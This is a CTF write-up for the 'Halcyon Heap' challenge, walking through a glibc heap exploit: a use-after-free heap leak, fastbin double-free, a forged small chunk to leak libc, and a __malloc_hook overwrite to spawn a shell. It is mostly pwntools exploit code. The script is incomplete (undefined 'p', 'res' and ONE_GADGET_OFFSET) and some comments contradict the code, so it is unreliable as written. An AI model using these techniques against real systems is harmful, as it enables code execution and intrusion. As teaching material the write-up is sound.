Rating: 5.0

# Halcyon Heap
200 points

Welcome to the sunny land of [Halcyon Heap](https://static.tjctf.org/d87f3952b7283e14cb5507d52436f8ee9af762a89edf2d9d9b8a805132ec2d2a_halcyon_heap), where the fastbins are fast and the smallbins don't exist! ([libc](https://static.tjctf.org/74ca69ada4429ae5fce87f7e3addb56f1b53964599e8526244fecd164b3c4b44_libc.so.6))

Hint: If you want smallbins done right you do it on your own.

## Intro
Before we even run the binary let's check the security features with checksec:

\$ checksec ./halcyon_heap
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

Right away what sticks out is that this binary is PIE enabled.

What does the binary look like when we run it?

Welcome to Halcyon Heap!
1. Sice a deet
2. Observe a deet
3. Brutally destroy a deet
4. Exit
>

Ah, it seems to be a heap challenge.

After some reverse engineering the different menu options can be described in full.
1. malloc() a message of any length up to and including 0x78. The message is read through STDIN using read(). A max of 16 messages can be created.
2. write() out the contents of a message based on its index.
3. free() a message based on its index.
4. exit(0)

A couple bugs arise because of this binary's functionality:
- UAF - a message can be read after being free()'d
- Double free - the free() menu option doesn't check if the message has already been free()'d

## Goals
The overarching goal of this binary is to launch a shell on a remote server running this application to then read the flag. Based on this goal we can devise a plan to achieve a remote shell:
- Leak the heap base
- Use the leaked heap base to create a fake small chunk
- Free the small chunk to get a pointer to the main arena, thus leaking a libc address
- Overwrite __malloc_hook with a one_gadget

All of these steps can be achieved through known heap exploitation techniques but what makes this challenge unique are the constraints:
- Fast bin size allocations (makes leaking libc harder!)
- 16 allocations total
- Main program is PIE and full RELRO (no GOT overwrite!)

## Setup
To get start we can create a framework around the pwnable using [pwntools](https://github.com/Gallopsled/pwntools). My boilerplate setup for pwntools looks a bit like this:
python
from pwn import *
import struct

context.binary = "./halcyon_heap"
context.terminal = "/bin/bash"

e = ELF("./halcyon_heap")
libc = ELF("./libc.so.6")
# gdb.attach(p)

@atexception.register
def handler():
log.failure(p.recvall())



Next, to interact with the binary we can create some helper functions like this:
python
next_deet_index = 0

def create_deet(size, value):
global next_deet_index
assert len(value) <= size
p.sendline("1")
p.sendlineafter("> ", str(size))
p.sendlineafter("> ", value)
result = next_deet_index
next_deet_index += 1
return result

def delete_deet(idx):
p.sendline("3")
p.sendlineafter("> ", str(idx))

def view_deet(idx):
p.sendline("2")
p.sendlineafter("> ", str(idx))
end = res.find("Welcome to Halcyon")
deet = res[0:end]
log.info("deet " + chr(ord("a") + idx) + ":" )
print hexdump(deet)
return deet


## Leaking the Heap Base
To leak the heap base we can abuse our first bug, a UAF. To do this we make two allocations that are of the same fast bin index, let's say 64 byte allocations named a and b. If we free a then b, b will have its fwd pointer set to the start of a's chunk header, which is also the heap base. If we then read the first uint64_t off of b (aka its fwd pointer) we get the heap base. This is what it looks like in code:
python
a = create_deet(64, "")
b = create_deet(64, "")

delete_deet(a)
delete_deet(b)

res = view_deet(b)
HEAP_BASE = struct.unpack_from("Q", res, 0)[0]
log.info("HEAP_BASE: " + hex(HEAP_BASE))


## Creating a Fake Small Chunk
To create a fake chunk we must first overwrite the header of an existing chunk to set the size value to be larger than 0x80. However, what is tricky with this is that with the new size the chunk must still meet all integrity checks done by free().

To overwrite the header of an existing chunk we will make use of the double free bug we found earlier. For malloc() to keep small allocations fast it will take the first chunk off the fast bin free list that meets the size requested by malloc(). This functionality is called "first fit" and can easily be tested and proven in a small C program. An abuse of this functionality can be demonstrated in the following code:
python
a = create_deet(64, "")
b = create_deet(64, "")

# add a to the free list
delete_deet(a)
# free a different allocation inbetween to avoid double free detection
# add b to the free list
delete_deet(b)
# add a to the free list
delete_deet(a)

# now the free list looks like this:
# a -> b -> a

# our next allocation will be where a was
# by initializing the content of a with a value where the fwd
# pointer would be we can make malloc return an arbitrary pointer
# this allocation will be where b was
d = create_deet(64, "")
# this allocation will be where a was
# since the a allocation had its fwd pointer set to 0xdeadbeefdeadbeef
# the next pointer returned by malloc() will be this arbitrary pointer
e = create_deet(64, "")

# isn't a valid address it will segfault
f = create_deet(64, "")


Now putting it all together we can start overwriting a chunk header with our arbitrary pointer fast bin attack. In this example we will overwrite the header of chunk b to set the size of it to 0xa0.
python
a = create_deet(64, "")
b = create_deet(64, "")

delete_deet(a)
delete_deet(b)

# using a UAF we can read b's fwd pointer to leak the heap base
res = view_deet(b)
HEAP_BASE = struct.unpack_from("Q", res, 0)[0]
log.info("HEAP_BASE: " + hex(HEAP_BASE))

delete_deet(a)

# we set the arbitrary malloc return pointer to point to
# the user data portion of the a chunk
# the 0x51 is also there to act as the size for the fastbin
# chunk
# we got this size by doing 64 + 0x10 | 1 (we set the first bit
# # so that the prev_inuse flag is set on the chunk which is required
# for all fast chunks)
c = create_deet(64, p64(HEAP_BASE + 0x10) + p64(0x51)) # equivalent to a
d = create_deet(64, "") # equivalent to b
e = create_deet(64, "") # equivalent to a

# this is our arbitrary chunk
# the last 0x10 bytes of this chunk overlap with the 0x10 byte
# chunk header of the chunk after it, chunk b
# by overwriting the header of chunk b we can set the size of
# chunk b to small chunk size, in this case we using size 0xa0
f = create_deet(64, p64(0) * 7 + p64(0xa0))

Q: Why do we want b to be a small chunk?

A: When you free a small chunk it's fwd pointer is set to somewhere in libc, the main arena. Thus freeing a small chunk can be used to leak a libc address that can be used to calculate the libc base. We use a small chunk rather than a fast chunk because this doesn't happen normally with fast chunks.

Q: What happens when we try to free chunk b now?

A: Try it for yourself and see! Or, for the lazy people this is what is printed:

[-] *** Error in halcyon_heap': double free or corruption (!prev): 0x00007ffff2abe060 ***

## Freeing the Fake Small Chunk, Leaking libc
Seemingly we are now failing an integrity check with our fake chunk. [Here](https://heap-exploitation.dhavalkapil.com/diving_into_glibc_heap/security_checks.html) you can see some common integrity check messages and their respective reasons. It seems like the next chunk in memory's prev_inuse bit isn't set. We can resolve this by making another allocation and creating a fake chunk header that has its prev_inuse bit set. Continuing with the last bit of code we can write the following:
python
# this allocation will create a fake chunk in memory at an offset
# that is at b + b.size
# the purpose of this chunk is to resolve the
# "double free or corruption (!prev)" error
g = create_deet(0x78, p64(0) * 9 + p64(0x51))

delete_deet(b)

Now we fail a new integrity check:

[-] *** Error in halcyon_heap': corrupted size vs. prev_size: 0x00007fffe24c8050 ***

After looking up this error, we can see that this is caused by the fact that our fake chunk header in g has an incorrect prev_size. We can apply the following fix to resolve this:
python
g = create_deet(0x78, p64(0) * 8 + p64(0xa0) + p64(0x51))

Now free()ing chunk b will work... right? RIGHT???

Sadly, no. We fail a new integrity check:

[-] *** Error in halcyon_heap': corrupted double-linked list: 0x00007fffc3436050 ***

Here, we are encountering the infamous unlink() macro integrity check. The resolution for this is a simple change of a previous line:
python
# for when we free our corrupted chunk, b, we want its fwd and
# bck pointers to be correct for an unlink() check
d = create_deet(64, p64(HEAP_BASE + 0x50) + p64(HEAP_BASE + 0x50)) # equivalent to b

Of course it isn't over yet, we get yet another error from free()ing b:

[-] *** Error in halcyon_heap': corrupted size vs. prev_size: 0x00007fffbf4880f0 ***

Hmmmm, seems familiar, right? It seems that our fake chunk we made in our g chunk is getting checked too and doesn't have a valid chunk after it in memory. This can be resolved by setting the size value in the header of the fake chunk so that the unlink() macro thinks the wilderness is next. The necessary modification is as follows:
python
# makes unlink() think that the wilderness is after this chunk
# so it doesn't throw the "corrupted size vs. prev_size" error
g = create_deet(0x78, p64(0) * 8 + p64(0xa0) + p64(0x31))

Now, after all of these errors we can finally free chunk b, the chunk we corrupted into being a small chunk. Because b is a small chunk and freed successfully, we can finally taste the fruits of our labor. By reading b we get a pointer into libc! The following code demonstrates this:
python
# free() chunk b so that it gets added to the unsorted free list
# and has a pointer into libc
delete_deet(b)

# read the pointer into libc and calculate libc base
res = view_deet(b)
MAIN_ARENA = struct.unpack_from("Q", res, 0)[0]
log.info("MAIN_ARENA: " + hex(MAIN_ARENA))
LIBC_BASE = MAIN_ARENA - 0x3c4b78
log.info("LIBC_BASE: " + hex(LIBC_BASE))

## Achieving Code Execution Through Arbitrary Write
That trick we used earlier to have malloc return an arbitrary pointer, maybe that can be used again to overwrite a value in libc to control RIP. Our prime candidate in being overwritten is __malloc_hook. It's easy for us to trigger and is inside libc!

Let's put this to the test in the following code to see if we can overwrite __malloc_hook with a one_gadget:
python
# a gadget that I found works with this exploit chain
# this is necessary to find the area in memory we want to overwrite
__malloc_hook = libc.symbols["__malloc_hook"]

# same old, same old exploit used above to have malloc return an
# arbitrary pointer
h = create_deet(0x10, "")
i = create_deet(0x10, "")

delete_deet(h)
delete_deet(i)
delete_deet(h)

# have malloc return the address of __malloc_hook
j = create_deet(0x10, p64(LIBC_BASE + __malloc_hook))
k = create_deet(0x10, "")
l = create_deet(0x10, "")
# overwrite __malloc_hook to point to our gadget
m = create_deet(0x10, p64(LIBC_BASE + ONE_GADGET_OFFSET))

Oh no, not another error...

[-] *** Error in halcyon_heap': malloc(): memory corruption (fast): 0x00007fbdbdff4b20 ***

Seems like we are hitting another one of those annoying integrity checks. malloc() doesn't want to return the address of __malloc_hook because it isn't a valid chunk, what it thinks is the header of it doesn't have a valid fast bin size. Let's look through gdb and see if there are any areas nearby __malloc_hook that are possible candidates for being a valid fast chunk header. Here is what shows up several bytes before __malloc_hook:

gef➤ x/40bx &__malloc_hook-8
0x7f4159df4af0: 0x60 0x32 0xdf 0x59 0x41 0x7f 0x00 0x00
0x7f4159df4af8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7f4159df4b00 <__memalign_hook>: 0x20 0x5e 0xab 0x59 0x41 0x7f 0x00 0x00
0x7f4159df4b08 <__realloc_hook>: 0x00 0x5a 0xab 0x59 0x41 0x7f 0x00 0x00
0x7f4159df4b10 <__malloc_hook>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

What we are looking for is a uint64_t in the range of [0x20, 0x80] to be a valid fast bin size. See it yet? I'll give a hint: it isn't aligned to an 8 byte boundary. At 0x7f4159df4af5 there is a 0x7f followed by several zeroes, this can be interpreted in little endian as 0x000000000000007f. This is a valid fast bin size!

To take advantage of this finding we can make some changes to have the returned pointer be slightly above __malloc_chunk so that it is valid and then offset our write so that it properly overwrites __malloc_chunk to be our one_gadget. Another change that must be made is the size of our allocations for this part of the exploit, 0x10 won't cut it anymore. We are upgrading our allocations to size 0x68 so when the header gets added they will be 0x78 which lands in the same fast bin as 0x7f. The following changes look like this in our code:
python
# same old, same old exploit used above to have malloc return an
# arbitrary pointer
h = create_deet(0x68, "")
i = create_deet(0x68, "")

delete_deet(h)
delete_deet(i)
delete_deet(h)

# have malloc return the address of __malloc_hook
# offset by -0x23 so that the pointer is a valid fast chunk
j = create_deet(0x68, p64(LIBC_BASE + __malloc_hook - 0x23))
k = create_deet(0x68, "")
l = create_deet(0x68, "")
# overwrite __malloc_hook to point to our gadget
m = create_deet(0x68, "\x00" * 0x13 + p64(LIBC_BASE + ONE_GADGET_OFFSET))


Now everything is ready! Next time malloc() is called our gadget will be jumped to and a shell will open! The very final bit of our exploit script is the following:
python
# trigger __malloc_hook by causing the binary to call malloc()
p.sendline("1")
p.sendlineafter("> ", "1")

p.interactive()

A very satisfying finale to a very frustrating exploit chain.

## Takeaways
There are a couple valuable things I've learned from this challenge about heap exploitation:
- Libc can be leaked through freeing a small chunk.
- __malloc_hook and __free_hook are great targets for getting arbitrary code execution when a binary is PIE enabled and you have a leak for libc.
- Fast bin attack to have malloc() return an arbitrary pointer can take advantage of a misaligned address to be a valid chunk.
- Even if you are restricted to fast bins, a chunk can be corrupted into being any bin necessary.

## Final Script
Below is the final exploit script. It's quite a beast compared to most high school CTF challenge exploit scripts.
python
from pwn import *
import struct

context.binary = "./halcyon_heap"
context.terminal = "/bin/bash"

e = ELF("./halcyon_heap")
libc = ELF("./libc.so.6")
# gdb.attach(p)

@atexception.register
def handler():
log.failure(p.recvall())

next_deet_index = 0

def create_deet(size, value):
global next_deet_index
assert len(value) <= size
p.sendline("1")
p.sendlineafter("> ", str(size))
p.sendlineafter("> ", value)
result = next_deet_index
next_deet_index += 1
return result

def delete_deet(idx):
p.sendline("3")
p.sendlineafter("> ", str(idx))

def view_deet(idx):
p.sendline("2")
p.sendlineafter("> ", str(idx))
end = res.find("Welcome to Halcyon")
deet = res[0:end]
log.info("deet " + chr(ord("a") + idx) + ":" )
print hexdump(deet)
return deet

a = create_deet(64, "")
b = create_deet(64, "")

delete_deet(a)
delete_deet(b)

# using a UAF we can read b's fwd pointer to leak the heap base
res = view_deet(b)
HEAP_BASE = struct.unpack_from("Q", res, 0)[0]
log.info("HEAP_BASE: " + hex(HEAP_BASE))

delete_deet(a)

# we set the arbitrary malloc return pointer to point to
# the user data portion of the a chunk
# the 0x51 is also there to act as the size for the fastbin
# chunk
# we got this size by doing 64 + 0x10 | 1 (we set the first bit
# # so that the prev_inuse flag is set on the chunk which is required
# for all fast chunks)
c = create_deet(64, p64(HEAP_BASE + 0x10) + p64(0x51)) # equivalent to a
# for when we free our corrupted chunk, b, we want its fwd and
# bck pointers to be correct for an unlink() check
d = create_deet(64, p64(HEAP_BASE + 0x50) + p64(HEAP_BASE + 0x50)) # equivalent to b
e = create_deet(64, "") # equivalent to a

# this is our arbitrary chunk
# the last 0x10 bytes of this chunk overlap with the 0x10 byte
# chunk header of the chunk after it, chunk b
# by overwriting the header of chunk b we can set the size of
# chunk b to small chunk size, in this case we using size 0xd0
f = create_deet(64, p64(0) * 7 + p64(0xa0))

# this allocation will create a fake chunk in memory at an offset
# that is at b + b.size
# the purpose of this chunk is to resolve the
# "double free or corruption (!prev)" error
# we also set the prev_size to 0xa0 to resolve the
# "corrupted size vs. prev_size" error
# having the fake chunk be size 0x31 is important because this
# makes unlink() think that the wilderness is after this chunk
# so it doesn't throw the "corrupted size vs. prev_size" error
g = create_deet(0x78, p64(0) * 8 + p64(0xa0) + p64(0x31))

# free() chunk b so that it gets added to the unsorted free list
# and has a pointer into libc
delete_deet(b)

# read the pointer into libc and calculate libc base
res = view_deet(b)
MAIN_ARENA = struct.unpack_from("Q", res, 0)[0]
log.info("MAIN_ARENA: " + hex(MAIN_ARENA))
# subtract 0x3c4b78 to get the base of libc
# this value was found by subtracting the libc base found using
# gdb from the value in MAIN_ARENA
LIBC_BASE = MAIN_ARENA - 0x3c4b78
log.info("LIBC_BASE: " + hex(LIBC_BASE))

# a gadget that I found works with this exploit chain
# this is necessary to find the area in memory we want to overwrite
__malloc_hook = libc.symbols["__malloc_hook"]

# same old, same old exploit used above to have malloc return an
# arbitrary pointer
h = create_deet(0x68, "")
i = create_deet(0x68, "")

delete_deet(h)
delete_deet(i)
delete_deet(h)

# have malloc return the address of __malloc_hook
# offset by -0x23 so that the pointer is a valid fast chunk
j = create_deet(0x68, p64(LIBC_BASE + __malloc_hook - 0x23))
k = create_deet(0x68, "")
l = create_deet(0x68, "")
# overwrite __malloc_hook to point to our gadget
m = create_deet(0x68, "\x00" * 0x13 + p64(LIBC_BASE + ONE_GADGET_OFFSET))

# trigger __malloc_hook by causing the binary to call malloc()
p.sendline("1")
p.sendlineafter("> ", "1")

p.interactive()
`